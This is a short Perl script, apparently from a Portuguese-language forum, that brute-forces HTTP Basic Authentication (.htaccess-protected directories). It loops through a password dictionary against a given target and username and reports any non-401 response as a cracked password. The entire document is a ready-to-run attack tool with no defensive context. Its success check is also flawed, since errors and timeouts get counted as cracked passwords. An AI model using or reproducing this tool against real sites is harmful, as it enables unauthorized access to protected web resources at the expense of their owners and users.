- Código:
#!/usr/bin/perl
# Brute Force .htaccess by MMxM
use HTTP::Request;
use LWP::UserAgent;
if(@ARGV != 3){
usage(); exit; } else { main(); }
sub usage(){
print "
Htaccess Brute-Force by MMxM *-*
How to use: $0 <target> <username> <dictionary file>
";
}
sub main(){
$site = $ARGV[0];
$user = $ARGV[1];
$pass = $ARGV[2];
if ( $site !~ /^http:\/\//) {
$site = 'http://' . $site;
}
if ( $site !~ /\/$/ ) {
$site = $site . '/';
}
print "\nAttacking ...\n\n";
sleep(2);
open(a,"<$pass") or die "$!";
while(<a>){
chomp($_);
my $req=HTTP::Request->new(GET=>$site);
my $ua=LWP::UserAgent->new();
$ua->timeout(15);
$req->authorization_basic($user, $_);
my $response=$ua->request($req);
my $code = $response->code;
if ($code == 401){
print " [*] User: $user Pass: $_ \n";
}else{
print "\n\t[*] Password Cracked: $_\n\n";
}
}
}
Participe do fórum, é rápido e fácil